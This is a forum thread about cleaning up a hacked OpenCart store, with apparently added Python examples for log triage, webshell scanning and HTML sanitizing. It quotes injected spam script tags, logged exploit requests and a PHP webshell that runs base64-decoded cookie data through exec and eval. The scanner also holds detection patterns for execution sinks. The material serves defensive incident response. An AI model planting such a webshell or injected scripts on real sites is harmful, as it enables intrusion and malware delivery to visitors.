Post by countzer0 » Wed Mar 29, 2017 8:19 pm

I have a client running a simple OC 2.2.0.0 installation which has been hacked. The hackers inserted links of the form:

Code:
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//spam.delivery.domain1.com/blah.php\'></script><script type=\"text/javascript\" src=\"//spam.delivery.domain2.com/blah.php\"></script><script async=\"async\" type=\"text/javascript\" src=\"//spam.delivery.domain3.com/blah.php\"></script>
into the description field of all the product categories. The scripts hijack all clicks to open dodgy popups full of malware etc.
The filesystem is intact as far as I can tell (I have compared with a clean install). When I stripped out the spam from the database, it was reinjected within hours.
I found the following suspicious requests in the logs (one for each category URL):

Code:
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_155&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5501 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
but I don't see how these could have been responsible.
Is OC 2.2.0.0 vulnerable to SQL injection? I thought db queries were filtered in OC? If so, how did they get in?

Thanks for any advice.
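The three log lines above share one property worth checking for systematically: every request carries query parameters (v, at1..at4) that the OpenCart category route never defines, with the same opaque values replayed against several category paths from one client in the same second. The following Python is an added example for triage, not code from the thread or from OpenCart. It parses the combined log format shown above, flags requests whose parameters fall outside an assumed allowlist of OpenCart 2.x catalog parameters, and clusters identical unknown values replayed across resources. The host names and client IPs in the sample are placeholders; the at1..at4 values are copied from the posted lines.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the combined-log format shown in the thread. Host names and
# client IPs are placeholders; the at1..at4 query values are copied from the posted lines.
SAMPLE_LOG = """\
shop.example 203.0.113.5 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 203.0.113.5
shop.example 203.0.113.5 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 203.0.113.5
shop.example 198.51.100.7 - - [28/Mar/2017:09:12:01 +0000] "GET /index.php?route=product/category&path=15_74&page=2 HTTP/1.1" 200 6100 "-" "Mozilla/5.0" 198.51.100.7
shop.example 198.51.100.7 - - [28/Mar/2017:09:12:05 +0000] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 7000 "-" "Mozilla/5.0" 198.51.100.7
"""

# vhost ip - - [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent" ...
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Query parameters the OpenCart 2.x catalog normally accepts on product pages.
# Assumed allowlist for this example; extend it from your own store's legitimate traffic.
KNOWN_PARAMS = {
    "route", "path", "product_id", "manufacturer_id", "information_id", "page",
    "limit", "sort", "order", "filter", "search", "tag", "description",
}


def parse_line(line):
    """Split one access-log line into its fields plus the decoded query string."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def looks_opaque(value):
    """Long unstructured hex/base64-like tokens are typical of control data, not of shop navigation."""
    return len(value) >= 20 and re.fullmatch(r"[A-Za-z0-9+/=_-]+", value) is not None


def analyse(log_text):
    """Return one finding per request that carries parameters the application does not define."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        unknown = sorted(k for k in rec["query"] if k not in KNOWN_PARAMS)
        if not unknown:
            continue
        values = {k: rec["query"][k][0] for k in unknown}
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "status": rec["status"],
            "resource": rec["query"].get("path", [rec["path"]])[0],
            "unknown": unknown,
            "opaque": sorted(k for k, v in values.items() if looks_opaque(v)),
            "values": values,
        })
    return findings


def replayed_tokens(findings):
    """Group findings by (client, identical unknown values). The same opaque token sent to
    several distinct resources is a stronger signal than a single odd request."""
    clusters = defaultdict(set)
    for f in findings:
        key = (f["ip"], tuple(sorted(f["values"].items())))
        clusters[key].add(f["resource"])
    return {key: sorted(res) for key, res in clusters.items() if len(res) >= 2}


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} path={f['resource']} unknown={f['unknown']} opaque={f['opaque']}")
    for (ip, _), resources in replayed_tokens(found).items():
        print(f"{ip} replayed the same unknown parameters against {len(resources)} resources: {resources}")
```

Run against the real access log, the interesting output is not the flagged lines themselves but the cluster: one client sending identical unknown tokens to every category in one second is something to correlate with the times the spam reappeared in the database, and with any file on the server that reads those parameter names.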


Post by angela » Thu Mar 30, 2017 2:07 am



Post by countzer0 » Thu Mar 30, 2017 3:59 pm

Thanks Angela. The exploit you linked to is a weakness in /system/helper/json.php. I compared the 2.2.0.0 and 2.3.0.2 versions of this file and they are identical. In other words, if this was the vulnerability, it's still present in the latest version... :(

A happy OpenCart developer from Brighton.



Post by ADD Creative » Thu Mar 30, 2017 7:23 pm

The logs you posted look more like a command to an exploit than an exploit itself.

I would compare all the OpenCart files on your server to the originals. Also check any VQmods or OCmod that may modify catalog/controller/product/category.php or anything in system.

ADD Creative - Web development and e-commerce development, Milton Keynes or Christchurch, UK
ADD Filtration - HVAC Panel Filters, Bag Filters and HEPA Filters



Post by angela » Thu Mar 30, 2017 10:46 pm

countzer0 wrote:
Thu Mar 30, 2017 3:59 pm
Thanks Angela. The exploit you linked to is a weakness in /system/helper/json.php. I compared the 2.2.0.0 and 2.3.0.2 versions of this file and they are identical. In other words, if this was the vulnerability, it's still present in the latest version... :(
The exploit only works if the PHP JSON extension is not installed.
Is PHP compiled with the JSON extension?

Other CVEs that may be worth checking (though mostly 1.x): http://www.cvedetails.com/vulnerability ... ncart.html

Others (is your client using Joomla?): http://www.exploitalert.com/search-resu ... h=OpenCart
and: https://github.com/opencart/opencart/issues/5151 (I tested this one on my installs, could not get it to work; may be dependent on server settings whether or not it's successful)

There was also one (can't find it right now) where you can edit system settings and change error.log to error.php -> upload a shell script -- BUT you need the admin logins to pull this off. So have them change their admin logins and lock /admin down by restricting to their IP or, if they don't use the backup module, remove it completely. And if their admin is named /admin, change it to something less obvious. You may need to update any vqmod or extensions that rely on /admin existing to the new path.


Post by countzer0 » Fri Mar 31, 2017 12:06 am

OK, I've just found something - a load of files in the /system/storage/download folder. They've all got names like:
route.php.jpg.e849b652eead396d7c1b6ad5bfa0408a
with old dates, so I thought they were just left over from old downloads. But the content of one of them is:

Code:
<?php
	echo "$#@&\n\n";

	if(isset($_COOKIE['76027405']) && !empty($_COOKIE['76027405'])) {
		echo htmlentities((string) base64_decode($_COOKIE['76027405']),ENT_QUOTES);
		echo "<pre>";
		$outbuf="";$outstr="";exec(base64_decode($_COOKIE['76027405']),$outbuf);foreach($outbuf as $val) $outstr.=$val."\r\n";echo htmlentities($outstr);
	} elseif(isset($_COOKIE['26312595']) && !empty($_COOKIE['26312595'])) {
		echo htmlentities((string) base64_decode($_COOKIE['26312595']),ENT_QUOTES);
		echo "<pre>"; 
		eval((string) base64_decode($_COOKIE['26312595']));
	} elseif(isset($_COOKIE['13037085'])) {
		phpinfo();
	}

?>
which looks like it will run code which is base64 encoded in a cookie...

A happy OpenCart developer from Brighton.
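ADD Creative's earlier advice to compare every file on the server against the originals, and the file just found under /system/storage/download, are two halves of one check: a baseline diff tells you which files are new or changed, and a content inspection of exactly those files tells you whether any of them is a backdoor of the kind shown above (an execution sink fed from base64-decoded cookie data, hidden under a double extension). The Python below is an added example, not code from the thread or from OpenCart. It builds a SHA-256 manifest of a clean tree, diffs a live tree against it, and inspects only the added or modified files. The two directory trees it scans are constructed in a temporary directory, and the planted file name is modelled on the one in the post with a placeholder suffix.

```python
import hashlib
import os
import re
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map every file under root (relative path) to its SHA-256 digest."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root)] = sha256_of(full)
    return out


# Content heuristics matching the backdoor pattern shown in the thread.
EXEC_SINK = re.compile(r"\b(?:eval|exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
DECODED_INPUT = re.compile(r"base64_decode\s*\(\s*\$_(?:COOKIE|REQUEST|GET|POST)", re.I)
RAW_INPUT = re.compile(r"\$_(?:COOKIE|REQUEST|GET|POST)\s*\[")
DOUBLE_EXT = re.compile(r"\.php\.", re.I)


def inspect_file(path):
    """Return the reasons a file looks like a webshell; an empty list means nothing matched."""
    reasons = []
    try:
        with open(path, "rb") as fh:
            text = fh.read(1_000_000).decode("utf-8", "replace")
    except OSError:
        return reasons
    has_php = "<?php" in text or "<?=" in text
    if DOUBLE_EXT.search(os.path.basename(path)) and has_php:
        reasons.append("PHP code under a disguised double extension")
    if EXEC_SINK.search(text) and DECODED_INPUT.search(text):
        reasons.append("execution sink fed from base64-decoded request data")
    elif has_php and EXEC_SINK.search(text) and RAW_INPUT.search(text):
        reasons.append("execution sink and request-controlled input in one file (weaker signal, review manually)")
    return reasons


def scan(clean_root, live_root):
    """Diff live_root against clean_root and inspect only the files that differ or are new."""
    base, live = manifest(clean_root), manifest(live_root)
    report = {"modified": [], "added": [], "missing": sorted(set(base) - set(live)), "flagged": {}}
    for rel, digest in live.items():
        if rel not in base:
            report["added"].append(rel)
        elif base[rel] != digest:
            report["modified"].append(rel)
    report["added"].sort()
    report["modified"].sort()
    for rel in report["added"] + report["modified"]:
        reasons = inspect_file(os.path.join(live_root, rel))
        if reasons:
            report["flagged"][rel] = reasons
    return report


# Constructed fixture: a two-file "clean install" and a live copy with one tampered core file
# and one planted file. The stand-in file contents are not real OpenCart code.
CLEAN_FILES = {
    "index.php": "<?php\n// constructed stand-in for the front controller\necho 'ok';\n",
    "system/helper/json.php": "<?php\n// constructed stand-in, not the real helper\nfunction json_ok() { return true; }\n",
}
PLANTED = {
    # name modelled on the thread's finding; the hash-like suffix is a placeholder
    "system/storage/download/route.php.jpg.0000000000constructed":
        "<?php\nif (isset($_COOKIE['k'])) { eval((string) base64_decode($_COOKIE['k'])); }\n",
}


def build_fixture():
    tmp = tempfile.mkdtemp()
    clean, live = os.path.join(tmp, "clean"), os.path.join(tmp, "live")
    for root, files in ((clean, CLEAN_FILES), (live, {**CLEAN_FILES, **PLANTED})):
        for rel, content in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(content)
    with open(os.path.join(live, "index.php"), "a") as fh:   # simulate a tampered core file
        fh.write("// appended by someone\n")
    return clean, live


if __name__ == "__main__":
    clean_dir, live_dir = build_fixture()
    result = scan(clean_dir, live_dir)
    for key in ("modified", "added", "missing"):
        print(f"{key}: {result[key]}")
    for rel, why in result["flagged"].items():
        print(f"FLAGGED {rel}: {'; '.join(why)}")
```

Point clean_root at an unpacked copy of the same OpenCart release and live_root at the deployed tree (with config.php and any legitimate customisations reviewed by hand, since they will always show as modified). Finding such a file is only half of the question; whether the web server would execute a file with that name inside the storage directory is the other half, and that depends on the server configuration rather than on OpenCart.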



Post by ADD Creative » Fri Mar 31, 2017 10:26 pm

That is an attempt to use an issue in old 1.5.x versions of OpenCart. The issue was that the uploaded file name was encrypted and sent to the uploader. The file name could then be decrypted, and they would then attempt to execute the uploaded file.

This will not be the issue if you are using version 2.x or your server .htaccess is correctly configured.

Did you find any other changes to the files on your server?

Did you check that JSON is installed (json support - enabled in phpinfo())?

ADD Creative - Web development and e-commerce development, Milton Keynes or Christchurch, UK
ADD Filtration - HVAC Panel Filters, Bag Filters and HEPA Filters



Post by countzer0 » Fri Mar 31, 2017 11:38 pm

OK thanks, it must be left over from the previous 1.5.x installation.

JSON support is enabled on the server. I can't find any other modified files.

I've changed all the passwords, cleaned the injected code out of the database, and put a function in my .tpl files to strip out any <script> tags. This was a few days ago. So far, so good...

A happy OpenCart developer from Brighton.
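Stripping `<script>` tags at render time, as described in the post above, is a reasonable stopgap, but a single regex pass is easy to get around: nested tags reassemble into a script element after the inner one is removed, and payloads can live in event-handler attributes or `javascript:` links without any script tag at all. The Python below is an added example, not code from the thread or from OpenCart, contrasting that naive approach with an allowlist sanitizer that rebuilds the description from parsed tokens and keeps only an assumed set of tags and attributes. The inputs are constructed, with a placeholder spam host.

```python
import re
from html import escape
from html.parser import HTMLParser

# Tags and attributes a category description legitimately needs (assumed allowlist for this example).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "a", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL = re.compile(r"^(?:https?:|/|#)", re.I)   # rejects javascript:, data:, vbscript: links
VOID_TAGS = {"br"}


def naive_strip(html):
    """Single-pass regex removal of <script> elements: the kind of fix that is easy to bypass."""
    return re.sub(r"<script\b[^>]*>.*?</script>", "", html, flags=re.I | re.S)


class AllowlistSanitizer(HTMLParser):
    """Rebuild the document from parsed tokens, emitting only allowlisted tags and attributes.
    Unknown tags are dropped, and script/style bodies are discarded rather than shown as text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if (name in ALLOWED_ATTRS.get(tag, set()) and value is not None
                    and SAFE_URL.match(value.strip())):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # re-escape so text can never become markup


def sanitize(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs: a benign description, an injected async script like the thread's,
    # a nested-tag evasion, and a payload carried by attributes instead of a script tag.
    samples = [
        '<p>Hand-made <b>chairs</b>, <a href="/catalog">see all</a></p>',
        '<p>Chairs</p><script async="async" type="text/javascript" src="//spam.example/x.php"></script>',
        "<scr<script></script>ipt>alert(1)</scr<script></script>ipt>",
        '<a href="javascript:alert(1)" onclick="steal()">link</a>',
    ]
    for s in samples:
        print("naive    :", naive_strip(s))
        print("allowlist:", sanitize(s))
        print()
```

The third sample is the instructive one: after the naive pass removes the two empty inner script elements, the leftovers join into a complete `<script>alert(1)</script>`, whereas the allowlist version never emits a tag it did not explicitly approve. Whichever language the template is written in, the same principle applies: rebuild from an allowlist rather than subtract from a denylist, and apply it both when the description is saved and when it is rendered.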



Post by angela » Sat Apr 01, 2017 1:16 am

countzer0 wrote:
Fri Mar 31, 2017 11:38 pm
OK thanks, it must be left over from the previous 1.5.x installation.
How long ago did they upgrade from 1.5 to 2.2? It's certainly plausible their site was hacked with an exploit from 1.5 and upgraded with the hack still in effect.

What were the last modified timestamps of the hack files? The hacker could certainly have changed them, but they may give you insight, assuming they were sloppy. Though, if the site had switched hosts after the hack and moved the files, they would have the date of first activity on the new host, unless modified/added at a later date.


Post by rhysjuk » Fri Apr 07, 2017 6:47 am

Unfortunately I also have a client who was hacked by these lowlifes. I had to rebuild the site and restore everything minus the product descriptions which held the dodgy pop-up scripts. I managed to lock down most of the files including json.php to 444 so they couldn't write to it; so far so good. The second time I rebuilt the site it was injected within a few hours, exactly as described above. Fingers crossed I've fixed it once and for all!
